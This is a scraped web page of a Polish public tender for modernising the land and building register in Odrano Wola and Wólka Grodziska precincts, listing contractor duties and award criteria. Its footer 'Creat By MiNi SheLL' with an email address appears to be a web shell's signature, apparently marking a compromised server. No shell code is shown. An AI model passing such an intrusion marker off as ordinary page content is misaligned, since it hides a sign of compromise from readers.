co do których w prowadzonym rejestrze gruntów jako właściciel wykazany jest Skarb Państwa, lub Jednostka Samorządu Terytorialnego, zaś jako użytkownik wieczysty, użytkownik, zarządca, lub trwały zarządca wpisany jest inny podmiot.c)	co do których wykazane są inne podmioty, które władają lub gospodarują nieruchomościami Skarbu Państwa lub jednostek samorządu terytorialnego. Z przeprowadzonych porównań Wykonawca sporządzi zestawienia w/g wzoru uzgodnionego z Zamawiającym;4)	pozyskanie danych do uzupełnienia baz danych dotyczących danych ewidencyjnych budynków o: a)	brakujące budynki, wraz ze wszystkimi danymi ewidencyjnymi dotyczącymi budynków wymienionymi w § 63 ust. 1 rozporządzenia.b)	zweryfikowanie i uzupełnienie informacji o budynkach dotychczas wykazanych w bazie danych opisowych ewidencji gruntów i budynków o dane ewidencyjne budynku wynikające z § 63 ust. 1 p. 2, 4, 5, 6, 8, 9, 11, 12, 14, 15, 16 oraz od 18 do 27 rozporządzenia. W przypadku zmiany przepisów prawa, dotyczących zakresu danych ewidencyjnych budynku, Wykonawca dostosuje zebrane dane o budynkach do treści tego przepisu, według stanu prawnego jaki obowiązywać będzie w dacie na 120 dni, przed upływem terminu umownego zakończenia prac. c)	zweryfikowanie położenia budynków dla których dane zostały pozyskane w wyniku digitalizacji ekranowej rastra, poprzez ich pomiar i sporządzenie wykazów zmian danych ewidencyjnych budynków.5)	zweryfikowanie z materiałami zasobu położenia punktów granicznych;6)	wykonanie pomiaru istniejących punktów osnowy służących do założenia ewidencji – należy odnaleźć i pomierzyć na aktualną osnowę (wykazaną w Banku Osnów) wszystkie odszukane punkty dawnej osnowy wykorzystywanej do założenia ewidencji gruntów. W przypadku gdy pomiar punktów granicznych wykazanych w operatach jednostkowych był wykonywany na osnowę inną niż obecnie wykazana w Banku Osnów, należy odszukać tę osnowę, pomierzyć ją w nawiązaniu do obecnej osnowy a następnie zharmonizować współrzędne w drodze transformacji, a w przypadku braku osnowy należy wykorzystać dane do ustalenia punktów granicznych. 7)	wykonanie ustalenia i pomiaru położenia punktów granicznych zgodnie z §§ 38 i 39 rozporządzenia w sprawie ewidencji gruntów i budynków, w przypadku gdy zachodzą okoliczności o których mowa w § 37 rozporządzenia, oraz przygotowanie w oparciu o wyniki tych pomiarów i ustaleń danych ewidencyjnych wyznaczających z wymaganą dokładnością, (o której mowa w § 29 ust.1 pkt.1 rozporządzenia w sprawie standardów technicznych), położenie punktów granicznych oraz przebieg granic działek ewidencyjnych. 8)	sporządzenie zestawienia uzyskanych powierzchni działek w wyniku harmonizacji danych oraz analiza dokładnościowa uzyskanych współrzędnych.9)	terenowa weryfikacja oraz wykonanie pomiarów uzupełniających w odniesieniu do zmienionych konturów użytków gruntowych ujawnionych w ramach prowadzonych prac modernizacji ewidencji gruntów i budynków zgodnie z zapisami od pkt IV.2.1.1 do pkt IV.2.1.3 projektu modernizacji ewidencji. Kontury użytków gruntowych określone na mapie ewidencyjnej oraz w operatach jednostkowych PZGiK podlegają weryfikacji za pomocą ortofotomapy oraz w drodze wywiadu terenowego. Wyniki porównania treści mapy ewidencyjnej w zakresie konturów użytków gruntowych, uzupełnionej danymi wynikającymi z operatów jednostkowych, z treścią ortofotomapy a także ze stanem faktycznym w terenie stwierdzonym w trakcie wywiadu terenowego, Wykonawca udokumentuje na kopii mapy ewidencyjnej. 10)	przygotowanie projektów dokumentów niezbędnych do wszczęcia z urzędu postępowania w sprawie przeprowadzenia gleboznawczej klasyfikacji gruntów i ich doręczenie stronom postępowania, zgodnie z zapisami pkt IV.2.4. projektu modernizacji, 11)	opracowanie operatu z projektem ustalenia gleboznawczej klasyfikacji gruntów dla zmienionych użytków rolnych i leśnych, o których mowa w punkcie 9 zgodnie z przepisami Rozporządzenia z dnia 12 września 2012 r. w sprawie gleboznawczej klasyfikacji gruntów (Dz. U. poz. 1246), 12)	przygotowanie projektu decyzji o ustaleniu klasyfikacji i jej doręczenie uczestnikom postępowania zgodnie z zapisami pkt IV.2.4. projektu modernizacji, 13)	skompletowanie dokumentacji geodezyjnej, kartograficznej (materiałów i informacji zgromadzonych w państwowym zasobie geodezyjnym i kartograficznym, uzupełnionych w niezbędnym zakresie terenowymi pomiarami geodezyjnymi oraz czynnościami ustalenia przebiegu granic) niezbędnej do wyeliminowania niespójności pomiędzy granicami sąsiadujących ze sobą jednostek ewidencyjnych oraz granicami obrębów ewidencyjnych;14)	opracowanie projektu operatu opisowo-kartograficznego, o którym mowa w art. 24a pkt. 4 ustawy, zwanego dalej „projektem operatu opisowo – kartograficznego”, uwzględniającego rezultaty prac, o których mowa w pkt. 1-11;15)	udział w czynnościach związanych z modernizacją ewidencji gruntów i budynków, o których mowa w art. 24a pkt. 7 ustawy;16)	przygotowanie plików umożliwiających zasilenie baz danych ewidencji gruntów i budynków rezultatami prac modernizacyjnych, w tym zawierających zmiany wynikające z uznania za uzasadnione zarzuty zgłoszone do projektu operatu opisowo-kartograficznego;17)	przygotowanie zawiadomień o zmianach danych ewidencyjnych, zgodnie z §49 rozporządzenia;18)	skompletowanie całości dokumentacji opracowanej w ramach zamówienia i przekazanie jej do państwowego zasobu geodezyjnego i kartograficznego.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71354300-7, 71353200-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-11-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Charakter zatrudnienia osób mających wpływ na jakość pracy</td><td style="border: 1px solid black;border-collapse: collapse;">25,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">15,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Modernizacja ewidencji gruntów i budynków dla wybranych obrębów z jednostki ewidencyjnej gmina Grodzisk Mazowiecki ( 140405_5): obręb Wólka Grodziska ( 140504_5.0033) w powiecie grodziskim</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>3.1.	Przedmiotem zamówienia jest wykonanie modernizacji ewidencji gruntów i budynków zgodnie z projektem modernizacji uzgodnionym przez Mazowieckiego Wojewódzkiego Inspektora Nadzoru Geodezyjnego i Kartograficznego, dla dwóch obrębów obszaru wiejskiego gminy Grodzisk Mazowiecki w powiecie grodziskim , w podziale na części: część nr 1 – wykonanie modernizacji ewidencji gruntów i budynków dla obrębu ewidencyjnego Odrano Wola (140504_5.0025).	część nr 2 - wykonanie modernizacji ewidencji gruntów i budynków dla obrębu ewidencyjnego Wólka Grodziska (140504_5.0033).3.2.	Do obowiązków Wykonawcy związanych z modernizacją ewidencji gruntów i budynków należeć będzie:1)	analiza materiałów przekazanych Wykonawcy do realizacji zadania,2)	wykonanie badania ksiąg wieczystych wykazanych w ewidencji gruntów pod względem zgodności treści ujawnionej w dziale I KW z danymi przedmiotowymi rejestru ewidencji gruntów. W przypadku stwierdzenia rozbieżności oznaczenia nieruchomości należy zbadać dokumenty złożone do księgi wieczystej pod względem istnienia map lub planów możliwych do wykorzystania w procesie modernizacji. Z przeprowadzonych porównań i badań dokumentów geodezyjnych złożonych do księgi wieczystej, Wykonawca sporządzi zestawienia w/g wzoru uzgodnionego z Zamawiającym;3)	dokonanie weryfikacji poprawności wpisów praw do działek ewidencyjnych:a)	co do których w prowadzonym rejestrze gruntów brak jest ustalonego właściciela, a także ustalonego tytułu do działki, a w rejestrze gruntów wykazani są: samoistni posiadacze, władający i użytkownicy. b)	co do których w prowadzonym rejestrze gruntów jako właściciel wykazany jest Skarb Państwa, lub Jednostka Samorządu Terytorialnego, zaś jako użytkownik wieczysty, użytkownik, zarządca, lub trwały zarządca wpisany jest inny podmiot.c)	co do których wykazane są inne podmioty, które władają lub gospodarują nieruchomościami Skarbu Państwa lub jednostek samorządu terytorialnego. Z przeprowadzonych porównań Wykonawca sporządzi zestawienia w/g wzoru uzgodnionego z Zamawiającym;4)	pozyskanie danych do uzupełnienia baz danych dotyczących danych ewidencyjnych budynków o: a)	brakujące budynki, wraz ze wszystkimi danymi ewidencyjnymi dotyczącymi budynków wymienionymi w § 63 ust. 1 rozporządzenia.b)	zweryfikowanie i uzupełnienie informacji o budynkach dotychczas wykazanych w bazie danych opisowych ewidencji gruntów i budynków o dane ewidencyjne budynku wynikające z § 63 ust. 1 p. 2, 4, 5, 6, 8, 9, 11, 12, 14, 15, 16 oraz od 18 do 27 rozporządzenia. W przypadku zmiany przepisów prawa, dotyczących zakresu danych ewidencyjnych budynku, Wykonawca dostosuje zebrane dane o budynkach do treści tego przepisu, według stanu prawnego jaki obowiązywać będzie w dacie na 120 dni, przed upływem terminu umownego zakończenia prac. c)	zweryfikowanie położenia budynków dla których dane zostały pozyskane w wyniku digitalizacji ekranowej rastra, poprzez ich pomiar i sporządzenie wykazów zmian danych ewidencyjnych budynków.5)	zweryfikowanie z materiałami zasobu położenia punktów granicznych;6)	wykonanie pomiaru istniejących punktów osnowy służących do założenia ewidencji – należy odnaleźć i pomierzyć na aktualną osnowę (wykazaną w Banku Osnów) wszystkie odszukane punkty dawnej osnowy wykorzystywanej do założenia ewidencji gruntów. W przypadku gdy pomiar punktów granicznych wykazanych w operatach jednostkowych był wykonywany na osnowę inną niż obecnie wykazana w Banku Osnów, należy odszukać tę osnowę, pomierzyć ją w nawiązaniu do obecnej osnowy a następnie zharmonizować współrzędne w drodze transformacji, a w przypadku braku osnowy należy wykorzystać dane do ustalenia punktów granicznych. 7)	wykonanie ustalenia i pomiaru położenia punktów granicznych zgodnie z §§ 38 i 39 rozporządzenia w sprawie ewidencji gruntów i budynków, w przypadku gdy zachodzą okoliczności o których mowa w § 37 rozporządzenia, oraz przygotowanie w oparciu o wyniki tych pomiarów i ustaleń danych ewidencyjnych wyznaczających z wymaganą dokładnością, (o której mowa w § 29 ust.1 pkt.1 rozporządzenia w sprawie standardów technicznych), położenie punktów granicznych oraz przebieg granic działek ewidencyjnych. 8)	sporządzenie zestawienia uzyskanych powierzchni działek w wyniku harmonizacji danych oraz analiza dokładnościowa uzyskanych współrzędnych.9)	terenowa weryfikacja oraz wykonanie pomiarów uzupełniających w odniesieniu do zmienionych konturów użytków gruntowych ujawnionych w ramach prowadzonych prac modernizacji ewidencji gruntów i budynków zgodnie z zapisami od pkt IV.2.1.1 do pkt IV.2.1.3 projektu modernizacji ewidencji. Kontury użytków gruntowych określone na mapie ewidencyjnej oraz w operatach jednostkowych PZGiK podlegają weryfikacji za pomocą ortofotomapy oraz w drodze wywiadu terenowego. Wyniki porównania treści mapy ewidencyjnej w zakresie konturów użytków gruntowych, uzupełnionej danymi wynikającymi z operatów jednostkowych, z treścią ortofotomapy a także ze stanem faktycznym w terenie stwierdzonym w trakcie wywiadu terenowego, Wykonawca udokumentuje na kopii mapy ewidencyjnej. 10)	przygotowanie projektów dokumentów niezbędnych do wszczęcia z urzędu postępowania w sprawie przeprowadzenia gleboznawczej klasyfikacji gruntów i ich doręczenie stronom postępowania, zgodnie z zapisami pkt IV.2.4. projektu modernizacji, 11)	opracowanie operatu z projektem ustalenia gleboznawczej klasyfikacji gruntów dla zmienionych użytków rolnych i leśnych, o których mowa w punkcie 9 zgodnie z przepisami Rozporządzenia z dnia 12 września 2012 r. w sprawie gleboznawczej klasyfikacji gruntów (Dz. U. poz. 1246), 12)	przygotowanie projektu decyzji o ustaleniu klasyfikacji i jej doręczenie uczestnikom postępowania zgodnie z zapisami pkt IV.2.4. projektu modernizacji, 13)	skompletowanie dokumentacji geodezyjnej, kartograficznej (materiałów i informacji zgromadzonych w państwowym zasobie geodezyjnym i kartograficznym, uzupełnionych w niezbędnym zakresie terenowymi pomiarami geodezyjnymi oraz czynnościami ustalenia przebiegu granic) niezbędnej do wyeliminowania niespójności pomiędzy granicami sąsiadujących ze sobą jednostek ewidencyjnych oraz granicami obrębów ewidencyjnych;14)	opracowanie projektu operatu opisowo-kartograficznego, o którym mowa w art. 24a pkt. 4 ustawy, zwanego dalej „projektem operatu opisowo – kartograficznego”, uwzględniającego rezultaty prac, o których mowa w pkt. 1-11;15)	udział w czynnościach związanych z modernizacją ewidencji gruntów i budynków, o których mowa w art. 24a pkt. 7 ustawy;16)	przygotowanie plików umożliwiających zasilenie baz danych ewidencji gruntów i budynków rezultatami prac modernizacyjnych, w tym zawierających zmiany wynikające z uznania za uzasadnione zarzuty zgłoszone do projektu operatu opisowo-kartograficznego;17)	przygotowanie zawiadomień o zmianach danych ewidencyjnych, zgodnie z §49 rozporządzenia;18)	skompletowanie całości dokumentacji opracowanej w ramach zamówienia i przekazanie jej do państwowego zasobu geodezyjnego i kartograficznego.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71354300-7, 71353200-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-11-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Charakter zatrudnienia osób mających wpływ na jakość pracy</td><td style="border: 1px solid black;border-collapse: collapse;">25,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">15,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com